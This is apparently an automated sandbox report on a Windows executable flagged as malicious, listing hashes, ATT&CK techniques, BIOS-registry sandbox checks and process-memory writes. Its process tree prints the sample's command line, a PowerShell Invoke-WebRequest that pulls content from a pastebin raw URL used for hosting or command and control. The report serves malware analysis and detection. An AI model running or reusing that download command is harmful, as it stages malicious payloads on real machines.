07fffac0e7f3c741104397eac2f7ca2f93214e37b062a027698812b0cdb94394

Analysis

max time kernel
12s
max time network
15s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
26/08/2024, 01:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

4C2026EA0ABF.exe
Size

3.2MB
MD5

64194a3d83301fa3a7560561e7496c16
SHA1

a598a982ee186d4308b9255c3f6c74a41190d52b
SHA256

07fffac0e7f3c741104397eac2f7ca2f93214e37b062a027698812b0cdb94394
SHA512

3c849fa88265b3b7db4f6d260d1bd1523441160cb770ec400b9ca1fdf95473f5347338d141a461fcec375923c70997e20e2c498b8c6fb7d36c8300bd3fbc40b2
SSDEEP

49152:HuVp4qNT3qn+hVjHiDsf+lQSxlE8/ff1WZhrphnEj63Qfvmcz3hU7YPIeYrmkaoK:Kp4qpoAVjB+lLG+alpquoz3xQ36

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
16	4080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
4080	powershell.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4C2026EA0ABF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4C2026EA0ABF.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
5	pastebin.com
16	pastebin.com

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4080	powershell.exe
4080	powershell.exe
4956	4C2026EA0ABF.exe
4956	4C2026EA0ABF.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4080	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4956 wrote to memory of 4020	4956	4C2026EA0ABF.exe	85
PID 4956 wrote to memory of 4020	4956	4C2026EA0ABF.exe	85
PID 4020 wrote to memory of 4080	4020	cmd.exe	86
PID 4020 wrote to memory of 4080	4020	cmd.exe	86
PID 4956 wrote to memory of 2980	4956	4C2026EA0ABF.exe	91
PID 4956 wrote to memory of 2980	4956	4C2026EA0ABF.exe	91
PID 4956 wrote to memory of 3772	4956	4C2026EA0ABF.exe	92
PID 4956 wrote to memory of 3772	4956	4C2026EA0ABF.exe	92

C:\Users\Admin\AppData\Local\Temp\4C2026EA0ABF.exe
"C:\Users\Admin\AppData\Local\Temp\4C2026EA0ABF.exe"
1⤵
- Checks BIOS information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://pastebin.com/raw/g7qWSa1Q' -OutFile 'entry-point.txt'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4020
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://pastebin.com/raw/g7qWSa1Q' -OutFile 'entry-point.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2980
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c pause
  2⤵
  PID:3772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_esgz55kx.yl3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\entry-point.txt

Filesize
64B

MD5
c45dcd47cce4a3869fd199ece5048887

SHA1
53fac956c08ab700b57629faeb2cde527b81f10e

SHA256
d06fdcbaabd1241776d2196a6997bf50d36d439577d77e283bfaaa7075aaf260

SHA512
35a5a412bc2eec1f701fbd0270bca577c1c65873cd17d2c4c66d73e0d6b93fff37672f5246314d6b559614bba137ac9199b325cb1d6a5dc001d5d16f2540b8ed

Download Submit
memory/4080-3-0x00007FFCBEF30000-0x00007FFCBF125000-memory.dmp

Filesize
2.0MB

Download
memory/4080-2-0x00007FFCBEF30000-0x00007FFCBF125000-memory.dmp

Filesize
2.0MB

Download
memory/4080-4-0x0000022FC49B0000-0x0000022FC49D2000-memory.dmp

Filesize
136KB

Download
memory/4080-17-0x00007FFCBEF30000-0x00007FFCBF125000-memory.dmp

Filesize
2.0MB

Download
memory/4956-0-0x00007FF6B7EA0000-0x00007FF6B90C0000-memory.dmp

Filesize
18.1MB

Download
memory/4956-1-0x00007FFCBEFD0000-0x00007FFCBEFD2000-memory.dmp

Filesize
8KB

Download
memory/4956-20-0x00007FF6B7EA0000-0x00007FF6B90C0000-memory.dmp

Filesize
18.1MB

Download
memory/4956-21-0x00007FF6B7EA0000-0x00007FF6B90C0000-memory.dmp

Filesize
18.1MB

Download